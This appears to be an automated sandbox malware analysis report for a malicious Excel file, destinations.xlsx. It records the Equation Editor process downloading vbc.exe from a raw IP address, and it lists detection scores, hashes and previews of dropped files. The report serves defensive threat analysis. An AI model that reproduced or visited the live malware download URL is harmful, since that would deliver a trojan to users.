    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe27%VirustotalBrowse
    C:\Users\Public\vbc.exe27%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://implantecapilarpereira.com/NetGen0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://192.3.121.153/00800800/vbc.exe2%VirustotalBrowse
    http://192.3.121.153/00800800/vbc.exe100%Avira URL Cloudmalware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://implantecapilarpereira.com/NetGentrue
    • Avira URL Cloud: safe
    unknown
    http://192.3.121.153/00800800/vbc.exetrue
    • 2%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpfalse
      high
      http://www.icra.org/vocabulary/.vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      192.3.121.153
      unknownUnited States
      36352AS-COLOCROSSINGUStrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:502631
      Start date:14.10.2021
      Start time:07:36:33
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 44s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:destinations.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/15@0/1
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 29.9% (good quality ratio 8.4%)
      • Quality average: 18.1%
      • Quality standard deviation: 31.1%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • TCP Packets have been reduced to 100

      Simulations

      Behavior and APIs

      TimeTypeDescription
      07:37:39API Interceptor59x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AS-COLOCROSSINGUShoho.armGet hashmaliciousBrowse
      • 172.245.26.223
      9HV44nndlNGet hashmaliciousBrowse
      • 107.173.10.2
      SecuriteInfo.com.Linux.BtcMine.477.14890.22904Get hashmaliciousBrowse
      • 107.174.85.135
      MqP0jnQnDsGet hashmaliciousBrowse
      • 107.173.176.7
      h53kqH28NuGet hashmaliciousBrowse
      • 107.173.176.7
      D8a4ajTd5LGet hashmaliciousBrowse
      • 107.173.176.7
      ucPSZiWwsbGet hashmaliciousBrowse
      • 107.173.176.7
      Y1Nx2LJUmAGet hashmaliciousBrowse
      • 107.173.176.7
      ykE1WsTD4qGet hashmaliciousBrowse
      • 107.173.176.7
      Sajeeb09908976745344567.xlsxGet hashmaliciousBrowse
      • 192.3.110.172
      Paymentslip 10132021.xlsxGet hashmaliciousBrowse
      • 192.3.13.95
      Swift.xlsxGet hashmaliciousBrowse
      • 192.3.222.155
      ojZRw3eBpNGet hashmaliciousBrowse
      • 107.172.24.165
      yEumlkJuVEGet hashmaliciousBrowse
      • 107.173.176.7
      DHL consignment number_600595460.xlsxGet hashmaliciousBrowse
      • 198.12.84.79
      4f0PBbcOBIGet hashmaliciousBrowse
      • 107.173.176.7
      IdXkXl1i9rGet hashmaliciousBrowse
      • 107.173.176.7
      RlypFfB7n8Get hashmaliciousBrowse
      • 107.173.176.7
      7iw4z5I41wGet hashmaliciousBrowse
      • 107.173.176.7
      6wfKGbEfZNGet hashmaliciousBrowse
      • 107.173.176.7

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):208896
      Entropy (8bit):4.14906794472717
      Encrypted:false
      SSDEEP:1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
      MD5:8777020A37B6797241A489A707B9784B
      SHA1:A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A
      SHA-256:8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
      SHA-512:0A9D13CA582DD72B4CDCE8C91A5226AEB8C70AC7A73FA5F9775C6D03753BF7EC856371F55BF5F5E38F0A1D84E375C80916E5508F89D91E7100A82C4E544174D8
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: Virustotal, Detection: 27%, Browse
      Reputation:low
      IE Cache URL:http://192.3.121.153/00800800/vbc.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......R.....................P......|.............@..........................@..............................................$...(.......&%..................................................................0... ....................................text............................... ..`.data...............................@....rsrc...&%.......0..................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21EEA90B.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\511BE33D.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):83904
      Entropy (8bit):7.986000888791215
      Encrypted:false
      SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
      MD5:9F9A7311810407794A153B7C74AED720
      SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
      SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
      SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\528BF790.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):497636
      Entropy (8bit):0.6294563664495783
      Encrypted:false
      SSDEEP:384:xFXXwBkNWZ3cJuUvmWnTG+W4kH8ddxzsFfWS:PXwBkNWZ3cjvmWa+Vkv
      MD5:D57A36414E1F432B9F2EADCA1F32EA87
      SHA1:357610FE63E07D4948AB4C3028E0A28D1F5E11F3
      SHA-256:1303048ECEE15E6A8E52DB06CBEFC973BE8B4AF6FF0A292B7D98F979CBAC6FB3
      SHA-512:CCD293A8FFE40246D6D8B56046D7E3D113D2E3C59526E12C42887DFE8F4E4A8A218073592DE88BB8F8F77B6F9538F9E85DD8094AD55658A1683FE782809430FA
      Malicious:false
      Reputation:low
      Preview: ....l...............,............=..\... EMF.......)...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................VZ$.......f`Z.@..%...d...............RQ.[..........t.....$Q.[...... ...Id`Z...... .........&..d`Z"...........O....................O......%...X...%...7...................{$..................C.a.l.i.b.r.i..............X......8...8XZ......&.dv......%...........%...........%...........!...............................F...(.......GDIC........................F....E...E..EMF+*@..$..........?...........?.........@..|D..pD...............................PNG........IHDR.............@..o....sRGB.........gAMA......a.....pHYs..........+....C.IDATx^.._
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BE9D81A.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E478DD9.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7AB1F435.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):21987
      Entropy (8bit):7.952828365949915
      Encrypted:false
      SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
      MD5:5A25F525D9F0D658AF52A4F78FE031D4
      SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
      SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
      SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
      Malicious:false
      Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC8064F.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):83904
      Entropy (8bit):7.986000888791215
      Encrypted:false
      SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
      MD5:9F9A7311810407794A153B7C74AED720
      SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
      SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
      SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
      Malicious:false
      Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1845553.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):21987
      Entropy (8bit):7.952828365949915
      Encrypted:false
      SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
      MD5:5A25F525D9F0D658AF52A4F78FE031D4
      SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
      SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
      SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
      Malicious:false
      Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC62CC04.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2D26738.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):68702
      Entropy (8bit):7.960564589117156
      Encrypted:false
      SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
      MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
      SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
      SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
      SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
      Malicious:false
      Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB8384B2.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):68702
      Entropy (8bit):7.960564589117156
      Encrypted:false
      SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
      MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
      SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
      SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
      SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
      Malicious:false
